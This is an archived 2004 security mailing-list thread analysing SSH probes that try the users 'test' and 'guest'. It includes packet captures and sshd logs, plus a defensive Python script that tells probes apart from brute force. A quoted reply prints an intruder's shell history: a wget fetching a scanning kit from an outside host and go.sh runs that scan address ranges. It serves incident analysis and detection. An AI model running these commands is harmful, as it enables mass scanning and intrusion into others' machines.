I've tested the exploit on my Slack 10 box, OpenSSH_3.8.1p1, from my machine. The tcpdump output follows:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
22:38:56.177625 IP (tos 0x0, ttl 61, id 64319, offset 0, flags [DF], length: 60) 82.77.45.170.35528 > 213.157.171.49.22: S [tcp sum ok] 49755694:49755694(0) win 5728 <mss 1432,sackOK,timestamp 272157969 0,nop,wscale 0>
22:38:56.190058 IP (tos 0x0, ttl 61, id 64320, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 5728 <nop,nop,timestamp 272157985 647644964>
22:38:56.239677 IP (tos 0x0, ttl 61, id 64321, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.239897 IP (tos 0x0, ttl 61, id 64322, offset 0, flags [DF], length: 72) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 win 5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.295474 IP (tos 0x0, ttl 61, id 64323, offset 0, flags [DF], length: 204) 82.77.45.170.35528 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 <nop,nop,timestamp 272158084 647645031>
22:38:56.347138 IP (tos 0x0, ttl 61, id 64324, offset 0, flags [DF], length: 196) 82.77.45.170.35528 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 <nop,nop,timestamp 272158136 647645122>
22:38:56.419528 IP (tos 0x0, ttl 61, id 64325, offset 0, flags [DF], length: 68) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 1098 win 7904 <nop,nop,timestamp 272158209 647645166>
22:38:56.476041 IP (tos 0x0, ttl 61, id 64326, offset 0, flags [DF], length: 104) 82.77.45.170.35528 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 <nop,nop,timestamp 272158264 647645246>
22:38:56.490631 IP (tos 0x0, ttl 61, id 64327, offset 0, flags [DF], length: 136) 82.77.45.170.35528 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 <nop,nop,timestamp 272158278 647645263>
22:38:56.506077 IP (tos 0x0, ttl 61, id 64328, offset 0, flags [DF], length: 104) 82.77.45.170.35528 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 <nop,nop,timestamp 272158302 647645285>
22:38:56.506232 IP (tos 0x0, ttl 61, id 64329, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 1234 win 7904 <nop,nop,timestamp 272158302 647645285>
22:38:56.511642 IP (tos 0x0, ttl 61, id 62364, offset 0, flags [DF], length: 60) 82.77.45.170.35529 > 213.157.171.49.22: S [tcp sum ok] 53755391:53755391(0) win 5728 <mss 1432,sackOK,timestamp 272158307 0,nop,wscale 0>
22:38:56.525150 IP (tos 0x0, ttl 61, id 64330, offset 0, flags [DF], length: 52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 1235 win 7904 <nop,nop,timestamp 272158310 647645295>
22:38:56.528352 IP (tos 0x0, ttl 61, id 62365, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 5728 <nop,nop,timestamp 272158324 647645298>
22:38:56.538958 IP (tos 0x0, ttl 61, id 62366, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.539178 IP (tos 0x0, ttl 61, id 62367, offset 0, flags [DF], length: 72) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 win 5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.584001 IP (tos 0x0, ttl 61, id 62368, offset 0, flags [DF], length: 204) 82.77.45.170.35529 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 <nop,nop,timestamp 272158363 647645329>
22:38:56.661544 IP (tos 0x0, ttl 61, id 62369, offset 0, flags [DF], length: 196) 82.77.45.170.35529 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 <nop,nop,timestamp 272158452 647645411>
22:38:56.744357 IP (tos 0x0, ttl 61, id 62370, offset 0, flags [DF], length: 68) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 1098 win 7904 <nop,nop,timestamp 272158504 647645479>
22:38:56.799022 IP (tos 0x0, ttl 61, id 62371, offset 0, flags [DF], length: 104) 82.77.45.170.35529 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 <nop,nop,timestamp 272158592 647645571>
22:38:56.811454 IP (tos 0x0, ttl 61, id 62372, offset 0, flags [DF], length: 136) 82.77.45.170.35529 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 <nop,nop,timestamp 272158601 647645586>
22:38:56.832211 IP (tos 0x0, ttl 61, id 62373, offset 0, flags [DF], length: 104) 82.77.45.170.35529 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 <nop,nop,timestamp 272158623 647645606>
22:38:56.832365 IP (tos 0x0, ttl 61, id 62374, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 1234 win 7904 <nop,nop,timestamp 272158623 647645606>
22:38:56.850483 IP (tos 0x0, ttl 61, id 62375, offset 0, flags [DF], length: 52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 1235 win 7904 <nop,nop,timestamp 272158638 647645621>

And this is the syslog entry:

Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170
Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 82.77.45.170 port 35528 ssh2
Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170
Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest from 82.77.45.170 port 35529 ssh2

Can anyone figure it out?

In a mail dated Thursday 29 July 2004 19:38, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>
> Whoever broke into the machine did not take any attempts to cover up his
> tracks - this is what I found in /root/.bash_history:
>
> ------
> id
> uname -a
> w
> id
> ls
> wgte frauder.us/linux/ssh.tgz
> wget frauder.us/linux/ssh.tgz
> tar xzvf ssh.tgz
> tar xvf ssh.tgz
> ls
> cd ssh
> ls
> ./go.sh 195.178
> ls
> pico uniq.txt
> vi uniq.txt
> ls
> rm -rf uniq.txt
> ./go.sh 167.205
> ls
> rm -rf uniq.txt vuln.txt
> ./go.sh 202.148.20
> ./go.sh 212.92
> ./go.sh 195.197
> ./go.sh 147.32
> ./go.sh 213.168
> ./go.sh 134.176
> ./go.sh 195.83
> ------
>
> um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> binaries:
>
> go.sh:
> -------
> ./ss 22 -b $1 -i eth0 -s 6
> cat bios.txt |sort | uniq > uniq.txt
> ./sshf
> -------
>
> * 'ss' apparently is some sort of portscanner
> * 'sshf' connects to every IP in uniq.txt and tries to log in as user
>   'test' first, then as user 'guest' (according to tcpdump).
>
> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> As already mentioned, I am far from being an expert, but if I can assist
> in further testing, then let me know. Please CC me, I am not subscribed
> to the list.
>
> cheers,
> Stefan
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
Andrei Galca-Vasiliu
Folio Q Advertising
www.fq.ro
Security is an illusion...
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
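The pattern both posters describe (exactly one failed login for 'test', then exactly one for 'guest', each on its own TCP connection, within the same second) is easy to tell apart from ordinary password guessing once the sshd log is parsed per source address. The following script is an added example written for this thread, not code from either poster or from the tool they discuss. It parses the four syslog lines quoted above plus some constructed lines for two other sources (the 192.0.2.x addresses and their usernames are made up) and labels each source as a single-attempt-per-account "probe", a repeated-attempt "brute-force", or "other". The log year, the 60-second window, and acceptance of the later "invalid user" wording in addition to "illegal user" are assumptions of the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log. The first four lines are the sshd entries quoted
# in the mail above; the remaining lines are made up (192.0.2.0/24 is the
# documentation range) to show a classic brute-force source and a single
# harmless failure next to the test/guest probe.
SAMPLE_SYSLOG = """\
Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170
Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 82.77.45.170 port 35528 ssh2
Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170
Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest from 82.77.45.170 port 35529 ssh2
Jul 29 22:40:01 master sshd[29530]: Failed password for root from 192.0.2.20 port 40001 ssh2
Jul 29 22:40:03 master sshd[29531]: Failed password for root from 192.0.2.20 port 40002 ssh2
Jul 29 22:40:05 master sshd[29532]: Failed password for root from 192.0.2.20 port 40003 ssh2
Jul 29 22:41:00 master sshd[29540]: Failed password for alice from 192.0.2.10 port 50000 ssh2
"""

# Matches the "Failed password" line, with or without the "illegal user"
# prefix (later OpenSSH releases say "invalid user"; accepting both is an
# assumption of this example). The "Illegal user X from IP" lines carry no
# port and are deliberately ignored: the failure line already has everything.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:(?:illegal|invalid) user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+) ssh2$"
)

# The account pair the thread reports the scanner trying.
PROBE_USERS = frozenset({"test", "guest"})


def parse_failed_logins(text, year=2004):
    """Yield (timestamp, user, ip, port) for each sshd 'Failed password' line.

    syslog lines carry no year, so one is supplied (assumed 2004 here).
    """
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"], int(m["port"])


def classify_sources(text, window_seconds=60):
    """Group failures by source IP and label each source.

    'brute-force': more than one attempt against the same username.
    'probe'      : every username tried once, each from its own connection
                   (distinct source port), the test/guest pair is present and
                   the whole run fits in the window. One attempt per account is
                   the tell-tale of a scanner looking for default accounts
                   rather than a password guesser.
    'other'      : anything else, e.g. one mistyped password.
    """
    by_ip = defaultdict(list)
    for ts, user, ip, port in parse_failed_logins(text):
        by_ip[ip].append((ts, user, port))

    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        users = [u for _, u, _ in events]
        ports = {p for _, _, p in events}
        span = (events[-1][0] - events[0][0]).total_seconds()
        per_user = {u: users.count(u) for u in set(users)}
        if max(per_user.values()) > 1:
            verdicts[ip] = "brute-force"
        elif (PROBE_USERS <= set(users) and len(ports) == len(events)
              and span <= window_seconds):
            verdicts[ip] = "probe"
        else:
            verdicts[ip] = "other"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in sorted(classify_sources(SAMPLE_SYSLOG).items()):
        print(f"{ip:16} {verdict}")
```

Run against the sample, the source from the thread is labelled "probe", the repeated root failures "brute-force", and the lone failure "other". A threshold-based brute-force rule (N failures in M seconds) would never fire on two attempts, which is exactly why the probe described in the thread looks harmless in a plain failure count; keying on one-attempt-per-account across distinct connections is what makes it visible.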
